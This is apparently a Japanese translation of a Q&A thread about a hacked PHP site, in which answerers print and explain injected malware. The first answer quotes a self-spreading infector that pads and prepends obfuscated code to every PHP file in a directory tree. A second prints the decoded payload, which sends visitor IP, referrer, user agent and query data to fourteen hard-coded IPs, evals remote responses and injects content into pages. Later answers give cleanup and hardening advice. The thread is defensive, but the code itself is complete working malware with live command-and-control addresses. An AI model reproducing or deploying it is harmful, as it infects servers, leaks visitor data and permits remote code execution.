    if (($pos === false) && ($pos2 === false)) {

        $code_t = 'if (!function_exists("GetMama")){  function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}}  if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
        $mama = 'wtf';
        $mama = $_SERVER["HTTP_HOST"];
        $code_t = str_replace('###', $mama, $code_t);
        $code = '<'.'?php ';

        $prob = rand(5, 500);

        for ($i = 0; $i < 700 + $prob; $i++) {
            $code = $code.' ';
        }


        $code_t = Codee($code_t);


        $code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;

        $f = fopen($fname, "w");
        fputs($f, $code);
        fclose($f);
    }
    chmod($fname, 0644);

}

function dir_num($dir) {
    global $fileslist;
    static $deep = 0;

    $odir = @opendir($dir);

    while (($file = @readdir($odir)) !== FALSE) {
        if ($file == '.' || $file == '..') {
            continue;
        } else {
            echo '. ';
            if (
            get_file_extension($file) == 'php') {
                modify($dir.DIRECTORY_SEPARATOR.$file);
            }
        }

        if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
            $deep++;
            dir_num($dir.DIRECTORY_SEPARATOR.$file);
            $deep--;
        }
    }@closedir($odir);
}

Echo 'Wait please...<br>';

$dir = dirname(__FILE__);
dir_num($dir);



echo '<script>window.location.reload();</script>';
exit();

phpこの部分では、スクリプトは現在およびサブディレクトリ内の他のファイルを見つけようとし、それらにも感染します。

于 2012-04-09T19:53:55.043 に答える
5

そのようなスニペットをすべて削除し、すべてのパスワードを変更し、可能であれば、サポートが戻ってくるまでWebサイトをオフラインにします。コードを掘り下げてデコードした後、私はこれを見つけました:

<?php 

if (!function_exists("GetMama")){
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
        }str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
        }return $buf;
    }function opanki($buf){
        $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
        } else {$contents = mod_con($buf);
        }$len = strlen($contents);header("Content-Length: ".$len);return($contents);
    } function GetMama(){
        $mother = "www.99bits.com";return $mother;
    }ob_start("opanki");function ahfudflfzdhfhs($pa){
        $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {$host = "";
        }if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } else {$ip = "";
        }if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } else {$ref = "";
        }if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } else {$ua = "";
        }if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } else {$qs = "";
        }$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
            $ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
        } if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
        }if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
                    $ret  .=  fgets($fp, 128);
                }fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }
        }  if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
        }if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);return true;
        }else {return false;
        }
    }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}
于 2012-04-09T19:08:24.960 に答える
1

セキュリティのバックグラウンドから来て、私はあなたのウェブサーバーがハッキングされたとかなり確信しています。そもそも、その間違いが二度と起こらないように、ソースを調査することは一般的に良い考えです。

そもそも:

  • タイムスタンプを介して感染した最初のファイルを見つけます。
  • アクティブな実行中のスクリプトをログに記録して、これを引き起こしている原因やPHPログなどのエラーを特定します。

共有ホスティングを使用している場合、できることはあまりありません。共有ホスティングユーザーは一般に、クラックされやすくなりますが、VPS以上を使用している場合は、マネージドホスティングの場合はホストに連絡できます。完全なフォーマットまたは必要なセキュリティが修正されました。

ただし、これらのスニペットを削除しても、99.99%の確率で役に立たず、将来的にクラッカーを防ぐことはできません。パスワードを変更することは役に立ちますが、これも確実な解決策ではありません。

リソースがある場合は、セキュリティの専門家を雇って迅速な監査を行ってください。弱点を見つけた場合にのみ支払いを求める人はたくさんいます。そうでない場合は、サーバーの潜在的な弱点を再評価します。Linuxサーバーについてはこちらを参照してください(http://www.thegeekstuff.com/2011/03/apache-hardening)Windowsを使用している場合は、WindowsIISのいくつかにもリンクします。

お役に立てて嬉しいです!

于 2012-04-09T19:45:47.327 に答える
0

これは、サイトに挿入されたphpタイプのシェルスクリプトのようです。これは、Webホスティング会社または個人のWebアプリによる脆弱性であり、ハッキングが発生する可能性があります。

于 2012-04-09T19:08:15.820 に答える